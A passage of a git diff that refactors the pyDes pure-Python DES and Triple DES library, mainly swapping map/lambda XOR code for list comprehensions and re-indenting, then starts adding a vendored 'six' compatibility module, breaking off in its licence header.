Try setting the optional padding character") - else: - data += (self.block_size - (len(data) % self.block_size)) * self.getPadding() - # print "Len of data: %f" % (len(data) / self.block_size) - - if self.getMode() == CBC: - if self.getIV(): - iv = self.__String_to_BitList(self.getIV()) - else: - raise ValueError("For CBC mode, you must supply the Initial Value (IV) for ciphering") - - # Split the data into blocks, crypting each one seperately - i = 0 - dict = {} - result = [] - #cached = 0 - #lines = 0 - while i < len(data): - # Test code for caching encryption results - #lines += 1 - #if dict.has_key(data[i:i+8]): - #print "Cached result for: %s" % data[i:i+8] - # cached += 1 - # result.append(dict[data[i:i+8]]) - # i += 8 - # continue - - block = self.__String_to_BitList(data[i:i+8]) - - # Xor with IV if using CBC mode - if self.getMode() == CBC: - if crypt_type == des.ENCRYPT: - block = map(lambda x, y: x ^ y, block, iv) - #j = 0 - #while j < len(block): - # block[j] = block[j] ^ iv[j] - # j += 1 - - processed_block = self.__des_crypt(block, crypt_type) - - if crypt_type == des.DECRYPT: - processed_block = map(lambda x, y: x ^ y, processed_block, iv) - #j = 0 - #while j < len(processed_block): - # processed_block[j] = processed_block[j] ^ iv[j] - # j += 1 - iv = block - else: - iv = processed_block - else: - processed_block = self.__des_crypt(block, crypt_type) - - - # Add the resulting crypted block to our list - #d = self.__BitList_to_String(processed_block) - #result.append(d) - result.append(self.__BitList_to_String(processed_block)) - #dict[data[i:i+8]] = d - i += 8 - - # print "Lines: %d, cached: %d" % (lines, cached) - - # Return the full crypted string - if _pythonMajorVersion < 3: - return ''.join(result) - else: - return bytes.fromhex('').join(result) - - def encrypt(self, data, pad=None, padmode=None): - """encrypt(data, [pad], [padmode]) -> bytes - - data : Bytes to be encrypted - pad : Optional argument for encryption padding. Must only be one byte - padmode : Optional argument for overriding the padding mode. - - The data must be a multiple of 8 bytes and will be encrypted - with the already specified key. Data does not have to be a - multiple of 8 bytes if the padding character is supplied, or - the padmode is set to PAD_PKCS5, as bytes will then added to - ensure the be padded data is a multiple of 8 bytes. - """ - data = self._guardAgainstUnicode(data) - if pad is not None: - pad = self._guardAgainstUnicode(pad) - data = self._padData(data, pad, padmode) - return self.crypt(data, des.ENCRYPT) - - def decrypt(self, data, pad=None, padmode=None): - """decrypt(data, [pad], [padmode]) -> bytes - - data : Bytes to be encrypted - pad : Optional argument for decryption padding. Must only be one byte - padmode : Optional argument for overriding the padding mode. - - The data must be a multiple of 8 bytes and will be decrypted - with the already specified key. In PAD_NORMAL mode, if the - optional padding character is supplied, then the un-encrypted - data will have the padding characters removed from the end of - the bytes. This pad removal only occurs on the last 8 bytes of - the data (last data block). In PAD_PKCS5 mode, the special - padding end markers will be removed from the data after decrypting. 
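# A minimal usage sketch of the single-DES API described in the docstrings above,
# assuming this module is importable as pyDes; the key, IV and plaintext values
# below are illustrative only.
from pyDes import des, CBC, PAD_PKCS5

k = des(b"DESCRYPT", CBC, b"\0\0\0\0\0\0\0\0", pad=None, padmode=PAD_PKCS5)
ciphertext = k.encrypt(b"Please encrypt my data")          # PKCS5 pads to a multiple of 8 bytes
assert k.decrypt(ciphertext) == b"Please encrypt my data"  # padding removed unambiguously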
- """ - data = self._guardAgainstUnicode(data) - if pad is not None: - pad = self._guardAgainstUnicode(pad) - data = self.crypt(data, des.DECRYPT) - return self._unpadData(data, pad, padmode) + """DES encryption/decrytpion class + + Supports ECB (Electronic Code Book) and CBC (Cypher Block Chaining) modes. + + pyDes.des(key,[mode], [IV]) + + key -> Bytes containing the encryption key, must be exactly 8 bytes + mode -> Optional argument for encryption type, can be either pyDes.ECB + (Electronic Code Book), pyDes.CBC (Cypher Block Chaining) + IV -> Optional Initial Value bytes, must be supplied if using CBC mode. + Must be 8 bytes in length. + pad -> Optional argument, set the pad character (PAD_NORMAL) to use + during all encrypt/decrpt operations done with this instance. + padmode -> Optional argument, set the padding mode (PAD_NORMAL or + PAD_PKCS5) to use during all encrypt/decrpt operations done + with this instance. + """ + + + # Permutation and translation tables for DES + __pc1 = [56, 48, 40, 32, 24, 16, 8, + 0, 57, 49, 41, 33, 25, 17, + 9, 1, 58, 50, 42, 34, 26, + 18, 10, 2, 59, 51, 43, 35, + 62, 54, 46, 38, 30, 22, 14, + 6, 61, 53, 45, 37, 29, 21, + 13, 5, 60, 52, 44, 36, 28, + 20, 12, 4, 27, 19, 11, 3 + ] + + # number left rotations of pc1 + __left_rotations = [ + 1, 1, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 1 + ] + + # permuted choice key (table 2) + __pc2 = [ + 13, 16, 10, 23, 0, 4, + 2, 27, 14, 5, 20, 9, + 22, 18, 11, 3, 25, 7, + 15, 6, 26, 19, 12, 1, + 40, 51, 30, 36, 46, 54, + 29, 39, 50, 44, 32, 47, + 43, 48, 38, 55, 33, 52, + 45, 41, 49, 35, 28, 31 + ] + + # initial permutation IP + __ip = [57, 49, 41, 33, 25, 17, 9, 1, + 59, 51, 43, 35, 27, 19, 11, 3, + 61, 53, 45, 37, 29, 21, 13, 5, + 63, 55, 47, 39, 31, 23, 15, 7, + 56, 48, 40, 32, 24, 16, 8, 0, + 58, 50, 42, 34, 26, 18, 10, 2, + 60, 52, 44, 36, 28, 20, 12, 4, + 62, 54, 46, 38, 30, 22, 14, 6 + ] + + # Expansion table for turning 32 bit blocks into 48 bits + __expansion_table = [ + 31, 0, 1, 2, 3, 4, + 3, 4, 5, 6, 7, 8, + 7, 8, 9, 10, 11, 12, + 11, 12, 13, 14, 15, 16, + 15, 16, 17, 18, 19, 20, + 19, 20, 21, 22, 23, 24, + 23, 24, 25, 26, 27, 28, + 27, 28, 29, 30, 31, 0 + ] + + # The (in)famous S-boxes + __sbox = [ + # S1 + [14, 4, 13, 1, 2, 15, 11, 8, 3, 10, 6, 12, 5, 9, 0, 7, + 0, 15, 7, 4, 14, 2, 13, 1, 10, 6, 12, 11, 9, 5, 3, 8, + 4, 1, 14, 8, 13, 6, 2, 11, 15, 12, 9, 7, 3, 10, 5, 0, + 15, 12, 8, 2, 4, 9, 1, 7, 5, 11, 3, 14, 10, 0, 6, 13], + + # S2 + [15, 1, 8, 14, 6, 11, 3, 4, 9, 7, 2, 13, 12, 0, 5, 10, + 3, 13, 4, 7, 15, 2, 8, 14, 12, 0, 1, 10, 6, 9, 11, 5, + 0, 14, 7, 11, 10, 4, 13, 1, 5, 8, 12, 6, 9, 3, 2, 15, + 13, 8, 10, 1, 3, 15, 4, 2, 11, 6, 7, 12, 0, 5, 14, 9], + + # S3 + [10, 0, 9, 14, 6, 3, 15, 5, 1, 13, 12, 7, 11, 4, 2, 8, + 13, 7, 0, 9, 3, 4, 6, 10, 2, 8, 5, 14, 12, 11, 15, 1, + 13, 6, 4, 9, 8, 15, 3, 0, 11, 1, 2, 12, 5, 10, 14, 7, + 1, 10, 13, 0, 6, 9, 8, 7, 4, 15, 14, 3, 11, 5, 2, 12], + + # S4 + [7, 13, 14, 3, 0, 6, 9, 10, 1, 2, 8, 5, 11, 12, 4, 15, + 13, 8, 11, 5, 6, 15, 0, 3, 4, 7, 2, 12, 1, 10, 14, 9, + 10, 6, 9, 0, 12, 11, 7, 13, 15, 1, 3, 14, 5, 2, 8, 4, + 3, 15, 0, 6, 10, 1, 13, 8, 9, 4, 5, 11, 12, 7, 2, 14], + + # S5 + [2, 12, 4, 1, 7, 10, 11, 6, 8, 5, 3, 15, 13, 0, 14, 9, + 14, 11, 2, 12, 4, 7, 13, 1, 5, 0, 15, 10, 3, 9, 8, 6, + 4, 2, 1, 11, 10, 13, 7, 8, 15, 9, 12, 5, 6, 3, 0, 14, + 11, 8, 12, 7, 1, 14, 2, 13, 6, 15, 0, 9, 10, 4, 5, 3], + + # S6 + [12, 1, 10, 15, 9, 2, 6, 8, 0, 13, 3, 4, 14, 7, 5, 11, + 10, 15, 4, 2, 7, 12, 9, 5, 6, 1, 13, 14, 0, 11, 3, 8, + 9, 14, 15, 5, 2, 8, 12, 3, 7, 0, 4, 
10, 1, 13, 11, 6, + 4, 3, 2, 12, 9, 5, 15, 10, 11, 14, 1, 7, 6, 0, 8, 13], + + # S7 + [4, 11, 2, 14, 15, 0, 8, 13, 3, 12, 9, 7, 5, 10, 6, 1, + 13, 0, 11, 7, 4, 9, 1, 10, 14, 3, 5, 12, 2, 15, 8, 6, + 1, 4, 11, 13, 12, 3, 7, 14, 10, 15, 6, 8, 0, 5, 9, 2, + 6, 11, 13, 8, 1, 4, 10, 7, 9, 5, 0, 15, 14, 2, 3, 12], + + # S8 + [13, 2, 8, 4, 6, 15, 11, 1, 10, 9, 3, 14, 5, 0, 12, 7, + 1, 15, 13, 8, 10, 3, 7, 4, 12, 5, 6, 11, 0, 14, 9, 2, + 7, 11, 4, 1, 9, 12, 14, 2, 0, 6, 10, 13, 15, 3, 5, 8, + 2, 1, 14, 7, 4, 10, 8, 13, 15, 12, 9, 0, 3, 5, 6, 11], + ] + + + # 32-bit permutation function P used on the output of the S-boxes + __p = [ + 15, 6, 19, 20, 28, 11, + 27, 16, 0, 14, 22, 25, + 4, 17, 30, 9, 1, 7, + 23,13, 31, 26, 2, 8, + 18, 12, 29, 5, 21, 10, + 3, 24 + ] + + # final permutation IP^-1 + __fp = [ + 39, 7, 47, 15, 55, 23, 63, 31, + 38, 6, 46, 14, 54, 22, 62, 30, + 37, 5, 45, 13, 53, 21, 61, 29, + 36, 4, 44, 12, 52, 20, 60, 28, + 35, 3, 43, 11, 51, 19, 59, 27, + 34, 2, 42, 10, 50, 18, 58, 26, + 33, 1, 41, 9, 49, 17, 57, 25, + 32, 0, 40, 8, 48, 16, 56, 24 + ] + + # Type of crypting being done + ENCRYPT = 0x00 + DECRYPT = 0x01 + + # Initialisation + def __init__(self, key, mode=ECB, IV=None, pad=None, padmode=PAD_NORMAL): + # Sanity checking of arguments. + if len(key) != 8: + raise ValueError("Invalid DES key size. Key must be exactly 8 bytes long.") + _baseDes.__init__(self, mode, IV, pad, padmode) + self.key_size = 8 + + self.L = [] + self.R = [] + self.Kn = [ [0] * 48 ] * 16 # 16 48-bit keys (K1 - K16) + self.final = [] + + self.setKey(key) + + def setKey(self, key): + """Will set the crypting key for this object. Must be 8 bytes.""" + _baseDes.setKey(self, key) + self.__create_sub_keys() + + def __String_to_BitList(self, data): + """Turn the string data, into a list of bits (1, 0)'s""" + if _pythonMajorVersion < 3: + # Turn the strings into integers. Python 3 uses a bytes + # class, which already has this behaviour. 
+ data = [ord(c) for c in data] + l = len(data) * 8 + result = [0] * l + pos = 0 + for ch in data: + i = 7 + while i >= 0: + if ch & (1 << i) != 0: + result[pos] = 1 + else: + result[pos] = 0 + pos += 1 + i -= 1 + + return result + + def __BitList_to_String(self, data): + """Turn the list of bits -> data, into a string""" + result = [] + pos = 0 + c = 0 + while pos < len(data): + c += data[pos] << (7 - (pos % 8)) + if (pos % 8) == 7: + result.append(c) + c = 0 + pos += 1 + + if _pythonMajorVersion < 3: + return ''.join([ chr(c) for c in result ]) + else: + return bytes(result) + + def __permutate(self, table, block): + """Permutate this block with the specified table""" + return [block[i] for i in table] + + # Transform the secret key, so that it is ready for data processing + # Create the 16 subkeys, K[1] - K[16] + def __create_sub_keys(self): + """Create the 16 subkeys K[1] to K[16] from the given key""" + key = self.__permutate(des.__pc1, self.__String_to_BitList(self.getKey())) + i = 0 + # Split into Left and Right sections + self.L = key[:28] + self.R = key[28:] + while i < 16: + j = 0 + # Perform circular left shifts + while j < des.__left_rotations[i]: + self.L.append(self.L[0]) + del self.L[0] + + self.R.append(self.R[0]) + del self.R[0] + + j += 1 + + # Create one of the 16 subkeys through pc2 permutation + self.Kn[i] = self.__permutate(des.__pc2, self.L + self.R) + + i += 1 + + # Main part of the encryption algorithm, the number cruncher :) + def __des_crypt(self, block, crypt_type): + """Crypt the block of data through DES bit-manipulation""" + block = self.__permutate(des.__ip, block) + self.L = block[:32] + self.R = block[32:] + + # Encryption starts from Kn[1] through to Kn[16] + if crypt_type == des.ENCRYPT: + iteration = 0 + iteration_adjustment = 1 + # Decryption starts from Kn[16] down to Kn[1] + else: + iteration = 15 + iteration_adjustment = -1 + + i = 0 + while i < 16: + # Make a copy of R[i-1], this will later become L[i] + tempR = self.R[:] + + # Permutate R[i - 1] to start creating R[i] + self.R = self.__permutate(des.__expansion_table, self.R) + + # Exclusive or R[i - 1] with K[i], create B[1] to B[8] whilst here + self.R = [b ^ k for b, k in zip(self.R, self.Kn[iteration])] + B = [self.R[:6], self.R[6:12], self.R[12:18], self.R[18:24], self.R[24:30], self.R[30:36], self.R[36:42], self.R[42:]] + # Optimization: Replaced below commented code with above + #j = 0 + #B = [] + #while j < len(self.R): + # self.R[j] = self.R[j] ^ self.Kn[iteration][j] + # j += 1 + # if j % 6 == 0: + # B.append(self.R[j-6:j]) + + # Permutate B[1] to B[8] using the S-Boxes + j = 0 + Bn = [0] * 32 + pos = 0 + while j < 8: + # Work out the offsets + m = (B[j][0] << 1) + B[j][5] + n = (B[j][1] << 3) + (B[j][2] << 2) + (B[j][3] << 1) + B[j][4] + + # Find the permutation value + v = des.__sbox[j][(m << 4) + n] + + # Turn value into bits, add it to result: Bn + Bn[pos] = (v & 8) >> 3 + Bn[pos + 1] = (v & 4) >> 2 + Bn[pos + 2] = (v & 2) >> 1 + Bn[pos + 3] = v & 1 + + pos += 4 + j += 1 + + # Permutate the concatination of B[1] to B[8] (Bn) + self.R = self.__permutate(des.__p, Bn) + + # Xor with L[i - 1] + self.R = [b ^ l for b, l in zip(self.R, self.L)] + # Optimization: This now replaces the below commented code + #j = 0 + #while j < len(self.R): + # self.R[j] = self.R[j] ^ self.L[j] + # j += 1 + + # L[i] becomes R[i - 1] + self.L = tempR + + i += 1 + iteration += iteration_adjustment + + # Final permutation of R[16]L[16] + self.final = self.__permutate(des.__fp, self.R + self.L) + return 
self.final + + + # Data to be encrypted/decrypted + def crypt(self, data, crypt_type): + """Crypt the data in blocks, running it through des_crypt()""" + + # Error check the data + if not data: + return '' + if len(data) % self.block_size != 0: + if crypt_type == des.DECRYPT: # Decryption must work on 8 byte blocks + raise ValueError("Invalid data length, data must be a multiple of " + str(self.block_size) + " bytes\n.") + if not self.getPadding(): + raise ValueError("Invalid data length, data must be a multiple of " + str(self.block_size) + " bytes\n. Try setting the optional padding character") + else: + data += (self.block_size - (len(data) % self.block_size)) * self.getPadding() + # print "Len of data: %f" % (len(data) / self.block_size) + + if self.getMode() == CBC: + if self.getIV(): + iv = self.__String_to_BitList(self.getIV()) + else: + raise ValueError("For CBC mode, you must supply the Initial Value (IV) for ciphering") + + # Split the data into blocks, crypting each one seperately + i = 0 + dict = {} + result = [] + #cached = 0 + #lines = 0 + while i < len(data): + # Test code for caching encryption results + #lines += 1 + #if dict.has_key(data[i:i+8]): + #print "Cached result for: %s" % data[i:i+8] + # cached += 1 + # result.append(dict[data[i:i+8]]) + # i += 8 + # continue + + block = self.__String_to_BitList(data[i:i+8]) + + # Xor with IV if using CBC mode + if self.getMode() == CBC: + if crypt_type == des.ENCRYPT: + block = [b ^ v for b, v in zip(block, iv)] + #j = 0 + #while j < len(block): + # block[j] = block[j] ^ iv[j] + # j += 1 + + processed_block = self.__des_crypt(block, crypt_type) + + if crypt_type == des.DECRYPT: + processed_block = [b ^ v for b, v in zip(processed_block, iv)] + #j = 0 + #while j < len(processed_block): + # processed_block[j] = processed_block[j] ^ iv[j] + # j += 1 + iv = block + else: + iv = processed_block + else: + processed_block = self.__des_crypt(block, crypt_type) + + + # Add the resulting crypted block to our list + #d = self.__BitList_to_String(processed_block) + #result.append(d) + result.append(self.__BitList_to_String(processed_block)) + #dict[data[i:i+8]] = d + i += 8 + + # print "Lines: %d, cached: %d" % (lines, cached) + + # Return the full crypted string + if _pythonMajorVersion < 3: + return ''.join(result) + else: + return bytes.fromhex('').join(result) + + def encrypt(self, data, pad=None, padmode=None): + """encrypt(data, [pad], [padmode]) -> bytes + + data : Bytes to be encrypted + pad : Optional argument for encryption padding. Must only be one byte + padmode : Optional argument for overriding the padding mode. + + The data must be a multiple of 8 bytes and will be encrypted + with the already specified key. Data does not have to be a + multiple of 8 bytes if the padding character is supplied, or + the padmode is set to PAD_PKCS5, as bytes will then added to + ensure the be padded data is a multiple of 8 bytes. + """ + data = self._guardAgainstUnicode(data) + if pad is not None: + pad = self._guardAgainstUnicode(pad) + data = self._padData(data, pad, padmode) + return self.crypt(data, des.ENCRYPT) + + def decrypt(self, data, pad=None, padmode=None): + """decrypt(data, [pad], [padmode]) -> bytes + + data : Bytes to be encrypted + pad : Optional argument for decryption padding. Must only be one byte + padmode : Optional argument for overriding the padding mode. + + The data must be a multiple of 8 bytes and will be decrypted + with the already specified key. 
In PAD_NORMAL mode, if the + optional padding character is supplied, then the un-encrypted + data will have the padding characters removed from the end of + the bytes. This pad removal only occurs on the last 8 bytes of + the data (last data block). In PAD_PKCS5 mode, the special + padding end markers will be removed from the data after decrypting. + """ + data = self._guardAgainstUnicode(data) + if pad is not None: + pad = self._guardAgainstUnicode(pad) + data = self.crypt(data, des.DECRYPT) + return self._unpadData(data, pad, padmode) ############################################################################# -# Triple DES # +# Triple DES # ############################################################################# class triple_des(_baseDes): - """Triple DES encryption/decrytpion class - - This algorithm uses the DES-EDE3 (when a 24 byte key is supplied) or - the DES-EDE2 (when a 16 byte key is supplied) encryption methods. - Supports ECB (Electronic Code Book) and CBC (Cypher Block Chaining) modes. - - pyDes.des(key, [mode], [IV]) - - key -> Bytes containing the encryption key, must be either 16 or - 24 bytes long - mode -> Optional argument for encryption type, can be either pyDes.ECB - (Electronic Code Book), pyDes.CBC (Cypher Block Chaining) - IV -> Optional Initial Value bytes, must be supplied if using CBC mode. - Must be 8 bytes in length. - pad -> Optional argument, set the pad character (PAD_NORMAL) to use - during all encrypt/decrpt operations done with this instance. - padmode -> Optional argument, set the padding mode (PAD_NORMAL or - PAD_PKCS5) to use during all encrypt/decrpt operations done - with this instance. - """ - def __init__(self, key, mode=ECB, IV=None, pad=None, padmode=PAD_NORMAL): - _baseDes.__init__(self, mode, IV, pad, padmode) - self.setKey(key) - - def setKey(self, key): - """Will set the crypting key for this object. Either 16 or 24 bytes long.""" - self.key_size = 24 # Use DES-EDE3 mode - if len(key) != self.key_size: - if len(key) == 16: # Use DES-EDE2 mode - self.key_size = 16 - else: - raise ValueError("Invalid triple DES key size. Key must be either 16 or 24 bytes long") - if self.getMode() == CBC: - if not self.getIV(): - # Use the first 8 bytes of the key - self._iv = key[:self.block_size] - if len(self.getIV()) != self.block_size: - raise ValueError("Invalid IV, must be 8 bytes in length") - self.__key1 = des(key[:8], self._mode, self._iv, - self._padding, self._padmode) - self.__key2 = des(key[8:16], self._mode, self._iv, - self._padding, self._padmode) - if self.key_size == 16: - self.__key3 = self.__key1 - else: - self.__key3 = des(key[16:], self._mode, self._iv, - self._padding, self._padmode) - _baseDes.setKey(self, key) - - # Override setter methods to work on all 3 keys. - - def setMode(self, mode): - """Sets the type of crypting mode, pyDes.ECB or pyDes.CBC""" - _baseDes.setMode(self, mode) - for key in (self.__key1, self.__key2, self.__key3): - key.setMode(mode) - - def setPadding(self, pad): - """setPadding() -> bytes of length 1. 
Padding character.""" - _baseDes.setPadding(self, pad) - for key in (self.__key1, self.__key2, self.__key3): - key.setPadding(pad) - - def setPadMode(self, mode): - """Sets the type of padding mode, pyDes.PAD_NORMAL or pyDes.PAD_PKCS5""" - _baseDes.setPadMode(self, mode) - for key in (self.__key1, self.__key2, self.__key3): - key.setPadMode(mode) - - def setIV(self, IV): - """Will set the Initial Value, used in conjunction with CBC mode""" - _baseDes.setIV(self, IV) - for key in (self.__key1, self.__key2, self.__key3): - key.setIV(IV) - - def encrypt(self, data, pad=None, padmode=None): - """encrypt(data, [pad], [padmode]) -> bytes - - data : bytes to be encrypted - pad : Optional argument for encryption padding. Must only be one byte - padmode : Optional argument for overriding the padding mode. - - The data must be a multiple of 8 bytes and will be encrypted - with the already specified key. Data does not have to be a - multiple of 8 bytes if the padding character is supplied, or - the padmode is set to PAD_PKCS5, as bytes will then added to - ensure the be padded data is a multiple of 8 bytes. - """ - ENCRYPT = des.ENCRYPT - DECRYPT = des.DECRYPT - data = self._guardAgainstUnicode(data) - if pad is not None: - pad = self._guardAgainstUnicode(pad) - # Pad the data accordingly. - data = self._padData(data, pad, padmode) - if self.getMode() == CBC: - self.__key1.setIV(self.getIV()) - self.__key2.setIV(self.getIV()) - self.__key3.setIV(self.getIV()) - i = 0 - result = [] - while i < len(data): - block = self.__key1.crypt(data[i:i+8], ENCRYPT) - block = self.__key2.crypt(block, DECRYPT) - block = self.__key3.crypt(block, ENCRYPT) - self.__key1.setIV(block) - self.__key2.setIV(block) - self.__key3.setIV(block) - result.append(block) - i += 8 - if _pythonMajorVersion < 3: - return ''.join(result) - else: - return bytes.fromhex('').join(result) - else: - data = self.__key1.crypt(data, ENCRYPT) - data = self.__key2.crypt(data, DECRYPT) - return self.__key3.crypt(data, ENCRYPT) - - def decrypt(self, data, pad=None, padmode=None): - """decrypt(data, [pad], [padmode]) -> bytes - - data : bytes to be encrypted - pad : Optional argument for decryption padding. Must only be one byte - padmode : Optional argument for overriding the padding mode. - - The data must be a multiple of 8 bytes and will be decrypted - with the already specified key. In PAD_NORMAL mode, if the - optional padding character is supplied, then the un-encrypted - data will have the padding characters removed from the end of - the bytes. This pad removal only occurs on the last 8 bytes of - the data (last data block). In PAD_PKCS5 mode, the special - padding end markers will be removed from the data after - decrypting, no pad character is required for PAD_PKCS5. 
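# A small worked example of the PAD_PKCS5 scheme referred to above; this is plain
# PKCS#5 padding arithmetic, shown standalone and independent of any key or cipher.
# Each padded block ends with N bytes of value N, so the amount of padding can be
# read back from the last byte after decryption.
def pkcs5_pad(data, block_size=8):
    pad_len = block_size - (len(data) % block_size)   # always 1..block_size, never 0
    return data + bytes([pad_len] * pad_len)

def pkcs5_unpad(data):
    return data[:-data[-1]]                           # last byte says how much to strip

assert pkcs5_pad(b"12345") == b"12345\x03\x03\x03"
assert pkcs5_unpad(b"12345\x03\x03\x03") == b"12345"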
- """ - ENCRYPT = des.ENCRYPT - DECRYPT = des.DECRYPT - data = self._guardAgainstUnicode(data) - if pad is not None: - pad = self._guardAgainstUnicode(pad) - if self.getMode() == CBC: - self.__key1.setIV(self.getIV()) - self.__key2.setIV(self.getIV()) - self.__key3.setIV(self.getIV()) - i = 0 - result = [] - while i < len(data): - iv = data[i:i+8] - block = self.__key3.crypt(iv, DECRYPT) - block = self.__key2.crypt(block, ENCRYPT) - block = self.__key1.crypt(block, DECRYPT) - self.__key1.setIV(iv) - self.__key2.setIV(iv) - self.__key3.setIV(iv) - result.append(block) - i += 8 - if _pythonMajorVersion < 3: - data = ''.join(result) - else: - data = bytes.fromhex('').join(result) - else: - data = self.__key3.crypt(data, DECRYPT) - data = self.__key2.crypt(data, ENCRYPT) - data = self.__key1.crypt(data, DECRYPT) - return self._unpadData(data, pad, padmode) + """Triple DES encryption/decrytpion class + + This algorithm uses the DES-EDE3 (when a 24 byte key is supplied) or + the DES-EDE2 (when a 16 byte key is supplied) encryption methods. + Supports ECB (Electronic Code Book) and CBC (Cypher Block Chaining) modes. + + pyDes.des(key, [mode], [IV]) + + key -> Bytes containing the encryption key, must be either 16 or + 24 bytes long + mode -> Optional argument for encryption type, can be either pyDes.ECB + (Electronic Code Book), pyDes.CBC (Cypher Block Chaining) + IV -> Optional Initial Value bytes, must be supplied if using CBC mode. + Must be 8 bytes in length. + pad -> Optional argument, set the pad character (PAD_NORMAL) to use + during all encrypt/decrpt operations done with this instance. + padmode -> Optional argument, set the padding mode (PAD_NORMAL or + PAD_PKCS5) to use during all encrypt/decrpt operations done + with this instance. + """ + def __init__(self, key, mode=ECB, IV=None, pad=None, padmode=PAD_NORMAL): + _baseDes.__init__(self, mode, IV, pad, padmode) + self.setKey(key) + + def setKey(self, key): + """Will set the crypting key for this object. Either 16 or 24 bytes long.""" + self.key_size = 24 # Use DES-EDE3 mode + if len(key) != self.key_size: + if len(key) == 16: # Use DES-EDE2 mode + self.key_size = 16 + else: + raise ValueError("Invalid triple DES key size. Key must be either 16 or 24 bytes long") + if self.getMode() == CBC: + if not self.getIV(): + # Use the first 8 bytes of the key + self._iv = key[:self.block_size] + if len(self.getIV()) != self.block_size: + raise ValueError("Invalid IV, must be 8 bytes in length") + self.__key1 = des(key[:8], self._mode, self._iv, + self._padding, self._padmode) + self.__key2 = des(key[8:16], self._mode, self._iv, + self._padding, self._padmode) + if self.key_size == 16: + self.__key3 = self.__key1 + else: + self.__key3 = des(key[16:], self._mode, self._iv, + self._padding, self._padmode) + _baseDes.setKey(self, key) + + # Override setter methods to work on all 3 keys. + + def setMode(self, mode): + """Sets the type of crypting mode, pyDes.ECB or pyDes.CBC""" + _baseDes.setMode(self, mode) + for key in (self.__key1, self.__key2, self.__key3): + key.setMode(mode) + + def setPadding(self, pad): + """setPadding() -> bytes of length 1. 
Padding character.""" + _baseDes.setPadding(self, pad) + for key in (self.__key1, self.__key2, self.__key3): + key.setPadding(pad) + + def setPadMode(self, mode): + """Sets the type of padding mode, pyDes.PAD_NORMAL or pyDes.PAD_PKCS5""" + _baseDes.setPadMode(self, mode) + for key in (self.__key1, self.__key2, self.__key3): + key.setPadMode(mode) + + def setIV(self, IV): + """Will set the Initial Value, used in conjunction with CBC mode""" + _baseDes.setIV(self, IV) + for key in (self.__key1, self.__key2, self.__key3): + key.setIV(IV) + + def encrypt(self, data, pad=None, padmode=None): + """encrypt(data, [pad], [padmode]) -> bytes + + data : bytes to be encrypted + pad : Optional argument for encryption padding. Must only be one byte + padmode : Optional argument for overriding the padding mode. + + The data must be a multiple of 8 bytes and will be encrypted + with the already specified key. Data does not have to be a + multiple of 8 bytes if the padding character is supplied, or + the padmode is set to PAD_PKCS5, as bytes will then added to + ensure the be padded data is a multiple of 8 bytes. + """ + ENCRYPT = des.ENCRYPT + DECRYPT = des.DECRYPT + data = self._guardAgainstUnicode(data) + if pad is not None: + pad = self._guardAgainstUnicode(pad) + # Pad the data accordingly. + data = self._padData(data, pad, padmode) + if self.getMode() == CBC: + self.__key1.setIV(self.getIV()) + self.__key2.setIV(self.getIV()) + self.__key3.setIV(self.getIV()) + i = 0 + result = [] + while i < len(data): + block = self.__key1.crypt(data[i:i+8], ENCRYPT) + block = self.__key2.crypt(block, DECRYPT) + block = self.__key3.crypt(block, ENCRYPT) + self.__key1.setIV(block) + self.__key2.setIV(block) + self.__key3.setIV(block) + result.append(block) + i += 8 + if _pythonMajorVersion < 3: + return ''.join(result) + else: + return bytes.fromhex('').join(result) + else: + data = self.__key1.crypt(data, ENCRYPT) + data = self.__key2.crypt(data, DECRYPT) + return self.__key3.crypt(data, ENCRYPT) + + def decrypt(self, data, pad=None, padmode=None): + """decrypt(data, [pad], [padmode]) -> bytes + + data : bytes to be encrypted + pad : Optional argument for decryption padding. Must only be one byte + padmode : Optional argument for overriding the padding mode. + + The data must be a multiple of 8 bytes and will be decrypted + with the already specified key. In PAD_NORMAL mode, if the + optional padding character is supplied, then the un-encrypted + data will have the padding characters removed from the end of + the bytes. This pad removal only occurs on the last 8 bytes of + the data (last data block). In PAD_PKCS5 mode, the special + padding end markers will be removed from the data after + decrypting, no pad character is required for PAD_PKCS5. 
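# A minimal usage sketch of the triple_des API documented above, assuming this module
# is importable as pyDes; the 16-byte key selects DES-EDE2 mode and the all-zero
# 8-byte IV is illustrative only.
from pyDes import triple_des, CBC, PAD_PKCS5

k3 = triple_des(b"0123456789abcdef", CBC, b"\0" * 8, padmode=PAD_PKCS5)
secret = k3.encrypt(b"attack at dawn")
assert k3.decrypt(secret) == b"attack at dawn"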
+ """ + ENCRYPT = des.ENCRYPT + DECRYPT = des.DECRYPT + data = self._guardAgainstUnicode(data) + if pad is not None: + pad = self._guardAgainstUnicode(pad) + if self.getMode() == CBC: + self.__key1.setIV(self.getIV()) + self.__key2.setIV(self.getIV()) + self.__key3.setIV(self.getIV()) + i = 0 + result = [] + while i < len(data): + iv = data[i:i+8] + block = self.__key3.crypt(iv, DECRYPT) + block = self.__key2.crypt(block, ENCRYPT) + block = self.__key1.crypt(block, DECRYPT) + self.__key1.setIV(iv) + self.__key2.setIV(iv) + self.__key3.setIV(iv) + result.append(block) + i += 8 + if _pythonMajorVersion < 3: + data = ''.join(result) + else: + data = bytes.fromhex('').join(result) + else: + data = self.__key3.crypt(data, DECRYPT) + data = self.__key2.crypt(data, ENCRYPT) + data = self.__key1.crypt(data, DECRYPT) + return self._unpadData(data, pad, padmode) diff --git a/thirdparty/six/__init__.py b/thirdparty/six/__init__.py new file mode 100644 index 00000000000..3de5969b1ad --- /dev/null +++ b/thirdparty/six/__init__.py @@ -0,0 +1,1003 @@ +# Copyright (c) 2010-2024 Benjamin Peterson +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Utilities for writing code that 